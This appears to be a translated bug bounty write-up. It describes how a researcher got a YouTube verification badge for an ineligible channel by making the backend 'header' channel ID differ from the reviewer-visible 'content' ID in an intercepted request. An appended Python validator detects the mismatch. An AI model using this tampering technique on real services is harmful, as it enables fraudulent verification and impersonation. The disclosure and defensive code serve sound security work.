Disclaimer: the programs (methods) discussed in this article may be offensive in nature and are provided solely for security research and teaching. Readers who put this information to any other use bear full legal and joint liability; the author of the article bears no legal or joint liability.
New blog domain: https://gugesay.com
Introduction
This article shares the story of how an overseas white-hat researcher was able to assign a verification badge to any YouTube channel.
Before the story begins, some background on verification badges is in order:
Verification badges exist mainly to distinguish genuine celebrity or company accounts from potential impersonators, and so to prevent the fraud and impersonation that could otherwise result.
The story begins
First, we need a channel with more than 100,000 subscribers, since that is the prerequisite for obtaining the badge.
When Google's engineers designed the system they accounted for this: to reach the request-submission form at all, a channel with 100,000+ subscribers must be linked to the Google account.
When you do not meet the requirement, you see a notice like the one in the image below:
When you do qualify, it looks like the image below:
Next, click "Apply now", and a form like the following appears:
It has 2 fields:
Fill in both fields, then open a proxy tool such as Burp Suite and intercept the request generated after clicking "Submit":
POST /apis/cufinsert?v=0&psd=%7B%7D&helpcenter=youtube&hl=en&key=support-content&request_source=1&service_configuration=&mendel_ids=REDACTED HTTP/1.1
Host: support.google.com
Cookie: SUPPORT_CONTENT=REDACTED
Content-Length: 5373
Sec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126", "Brave";v="126"
Content-Type: text/plain;charset=UTF-8
X-Supportcontent-Allowapicookieauth: true
X-Supportcontent-Xsrftoken: REDACTED
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 REDACTED
Sec-Ch-Ua-Platform: "macOS"
Accept: */*
Sec-Gpc: 1
Accept-Language: en-US,en;q=0.5
Origin: https://support.google.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive
{"common_params":{"context_params":{"view_id":REDACTED}},"resource":{"form_id":"channel_verification","header":[{"name":"channel_name","value":"Japan"},{"name":"channel_id","value":"UCPu6Px6WxDjRgUNODpecwLg"},{"name":"subject_line","value":"Channel Verification Application"},{"name":"account_email","value":"redacted@gmail.com"},{"name":"\n\n:---- Automatically added fields ----","value":""},{"name":"Language","value":"en"},{"name":"IIILanguage","value":"en"},{"name":"country_code","value":"REDACTED"},{"name":"auto-helpcenter-id","value":"95"},{"name":"auto-helpcenter-name","value":"youtube"},{"name":"auto-internal-helpcenter-name","value":"youtube"},{"name":"auto-full-url","value":"https://support.google.com/youtube/contact/channel_verification?sjid=REDACTED"},{"name":"auto-user-logged-in","value":"true"},{"name":"auto-user-was-internal","value":"false"},{"name":"IssueType","value":"channel_verification"},{"name":"form-id","value":"channel_verification"},{"name":"form","value":"channel_verification"},{"name":"subject-line-field-id","value":"subject_line"},{"name":"body-text-field-id","value":""},{"name":"AutoDetectedBrowser","value":"Chrome 126.0.0.0"},{"name":"AutoDetectedOS","value":"Intel Mac OS X 10_15_7"},{"name":"MendelExperiments","value":"REDACTED"},{"name":"Form.support-content-visit-id","value":"REDACTED"},{"name":"experiment_0_id","value":""},{"name":"experiment_0_status","value":"OFF"}],"subject":"Channel Verification Application","content":"channel_name: Japan\nchannel_id: UCPu6Px6WxDjRgUNODpecwLg\nsubject_line: Channel Verification Application\naccount_email: redacted@gmail.com\n\n\n:---- Automatically added fields ----: \nLanguage: en\nIIILanguage: en\ncountry_code: REDACTED\nauto-helpcenter-id: 95\nauto-helpcenter-name: youtube\nauto-internal-helpcenter-name: youtube\nauto-full-url: https://support.google.com/youtube/contact/channel_verification?sjid=9325088441159645760-EU\nauto-user-logged-in: true\nauto-user-was-internal: false\nIssueType: channel_verification\nform-id: channel_verification\nform: channel_verification\nsubject-line-field-id: subject_line\nbody-text-field-id: \nAutoDetectedBrowser: Chrome 126.0.0.0\nAutoDetectedOS: Intel Mac OS X 10_15_7\nMendelExperiments: REDACTED\nForm.support-content-visit-id: REDACTED\nexperiment_0_id: \nexperiment_0_status: OFF\n","validate_only":false,"validation_info":"CgxjaGFubmVsX25hbWUKCmNoYW5uZWxfaWQKEXZlcmlmaWNhdGlvbl90ZXh0CgxzdWJqZWN0X2xpbmUKDWFjY291bnRfZW1haWw","language":"en","helpcenter_id":"95","active_experiments":"CjRzdWpfdmlkZW9fZXhwZXJpbWVudDo6c3VqX3ZpZGVvX2V4cGVyaW1lbnRfdHJlYXRtZW50","referer":"","referer_title":"","timezone_offset_minutes":420,"form_frd_values":[
The request looks roughly like the above; all cookies and some private information have been removed, so what you see is a simplified version.
Looking at the request body, the first question is why subject_line, account_email and many other things are supplied by the client at all. The e-mail address should be derived from the session cookie, not from a field like this.
Next, look at the body itself. For some reason, every key field (channel_name, channel_id, and so on) appears twice, and that turns out to matter.
The first set of fields, under "header", appears to be what the backend uses; the second, identical set sits under "content".
The purpose of the content is to let staff see the submitted input so they can verify it and proceed to the next step, which in this case is verifying the channel.
So how do you get an ineligible channel verified?
Very simply: in "header", insert the ineligible channel ID, and in "content", after "channel_id:", insert the eligible channel ID.
The final "header" portion of the request looks like this:
"resource":{"form_id":"channel_verification","header":[{"name":"channel_name","value":"Japan"},{"name":"channel_id","value":"UCPu6Px6WxDjRgUNODpecwLg"},{"name":"subject_line","value":"Channel Verification Application"},
"UCPu6Px6WxDjRgUNODpecwLg" is the ID of a channel with fewer than 100,000 subscribers.
The "content" portion looks like this:
"content":"channel_name: Japan\nchannel_id: UC-9-kyTW8ZkZNDHQJ6FgpwQ\nsubject_line: Channel Verification Application
Here I used "UC-9-kyTW8ZkZNDHQJ6FgpwQ", the ID of the auto-generated "Music" channel (https://youtube.com/channel/UC-9-kyTW8ZkZNDHQJ6FgpwQ).
When Google staff received the request, they saw UC-9-kyTW8ZkZNDHQJ6FgpwQ requesting channel verification, when in reality it was UCPu6Px6WxDjRgUNODpecwLg making the request.
If they went ahead and approved the request, the system would assign the badge to the UCPu6Px6WxDjRgUNODpecwLg channel.
The bug was reported a few months ago; the white-hat researcher received a $500 bounty for it, and the badge was kept.
Did you learn something?
The above was translated and compiled by 骨哥.
Original: https://vojtechcekal.medium.com/how-i-was-able-to-give-verification-badge-to-any-youtube-channel-and-bypass-needed-requirements-b88855afe4b7
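A defender-side check for the two weaknesses described above (fields trusted from the client, and a structured "header" copy that can diverge from the "content" copy reviewers read), as an added Python example that is not part of the original post and not Google's code. It re-derives the e-mail from the authenticated session, rejects any request whose header and content copies disagree on a critical field, applies the subscriber threshold to the header channel_id (the one the backend acts on), and regenerates the reviewer-visible text from the header copy so staff see exactly what will be approved. The request body is a cut-down copy of the one in the post, the subscriber counts are constructed for the demo, and the two channel IDs are the ones quoted in the post.

```python
import json
from typing import Callable, Dict, Optional, Tuple

# Fields that must agree between the backend copy ("header") and the
# reviewer copy ("content"); taken from the request shown in the post.
CRITICAL_FIELDS = ("channel_name", "channel_id", "subject_line", "account_email")

# Constructed subscriber counts: the real numbers are not on the page.
FAKE_SUBSCRIBERS = {
    "UCPu6Px6WxDjRgUNODpecwLg": 1_500,        # small channel from the post
    "UC-9-kyTW8ZkZNDHQJ6FgpwQ": 50_000_000,   # auto-generated "Music" channel
}


def header_fields(resource: dict) -> Dict[str, str]:
    """The structured fields the backend acts on."""
    return {f["name"]: f["value"] for f in resource.get("header", [])}


def parse_content_fields(content: str) -> Dict[str, str]:
    """Parse the 'key: value' lines of the human-readable blob that staff see.
    Separator lines such as ':---- Automatically added fields ----:' have an
    empty key and are skipped."""
    fields: Dict[str, str] = {}
    for line in content.split("\n"):
        key, sep, value = line.partition(":")
        key = key.strip()
        if sep and key:
            fields[key] = value.strip()
    return fields


def render_content(h: Dict[str, str]) -> str:
    """Server-side regeneration of the reviewer-visible text from the header
    copy, so the two can never disagree."""
    return "".join(f"{k}: {h[k]}\n" for k in CRITICAL_FIELDS if k in h)


def find_mismatches(resource: dict) -> Dict[str, Tuple[Optional[str], Optional[str]]]:
    """Return {field: (header_value, content_value)} for every critical field
    whose two copies differ."""
    h = header_fields(resource)
    c = parse_content_fields(resource.get("content", ""))
    return {k: (h.get(k), c.get(k)) for k in CRITICAL_FIELDS if h.get(k) != c.get(k)}


def mismatches_in(raw_body: str) -> Dict[str, Tuple[Optional[str], Optional[str]]]:
    return find_mismatches(json.loads(raw_body).get("resource", {}))


def validate_request(raw_body: str, session_email: str,
                     subscriber_lookup: Callable[[str], Optional[int]],
                     threshold: int = 100_000) -> Tuple[bool, str]:
    """Return (accepted, reason) for a rejected request, or
    (accepted, regenerated_content) for an accepted one."""
    resource = json.loads(raw_body).get("resource", {})
    h = header_fields(resource)
    # 1. Identity comes from the session, never from a client-supplied field.
    if h.get("account_email") != session_email:
        return False, "account_email does not match the authenticated session"
    # 2. The copy the backend acts on and the copy reviewers read must agree.
    mismatches = find_mismatches(resource)
    if mismatches:
        return False, "header/content mismatch: " + ", ".join(sorted(mismatches))
    # 3. Eligibility is checked on the channel_id that will actually be badged.
    subs = subscriber_lookup(h.get("channel_id", ""))
    if subs is None or subs < threshold:
        return False, "channel does not meet the subscriber requirement"
    return True, render_content(h)


def make_body(channel_name: str, channel_id: str, email: str) -> str:
    """Build a consistent (untampered) request body for testing."""
    h = {"channel_name": channel_name, "channel_id": channel_id,
         "subject_line": "Channel Verification Application", "account_email": email}
    return json.dumps({"resource": {
        "form_id": "channel_verification",
        "header": [{"name": k, "value": v} for k, v in h.items()],
        "content": render_content(h),
    }})


# Constructed sample reproducing the tampered request from the post: the header
# names the small channel, the content names the "Music" channel.
TAMPERED_BODY = json.dumps({"resource": {
    "form_id": "channel_verification",
    "header": [
        {"name": "channel_name", "value": "Japan"},
        {"name": "channel_id", "value": "UCPu6Px6WxDjRgUNODpecwLg"},
        {"name": "subject_line", "value": "Channel Verification Application"},
        {"name": "account_email", "value": "redacted@gmail.com"},
    ],
    "content": ("channel_name: Japan\nchannel_id: UC-9-kyTW8ZkZNDHQJ6FgpwQ\n"
                "subject_line: Channel Verification Application\n"
                "account_email: redacted@gmail.com\n\n\n"
                ":---- Automatically added fields ----: \nLanguage: en\n"),
}})

if __name__ == "__main__":
    print(validate_request(TAMPERED_BODY, "redacted@gmail.com", FAKE_SUBSCRIBERS.get))
    print(validate_request(make_body("Music", "UC-9-kyTW8ZkZNDHQJ6FgpwQ",
                                     "redacted@gmail.com"),
                           "redacted@gmail.com", FAKE_SUBSCRIBERS.get))
```

The order of the checks matters less than the fact that the reviewer never sees client-authored text: once the backend regenerates "content" from "header", the duplicated fields stop being an attack surface, and the mismatch check is only a tripwire for detecting tampering attempts in logs.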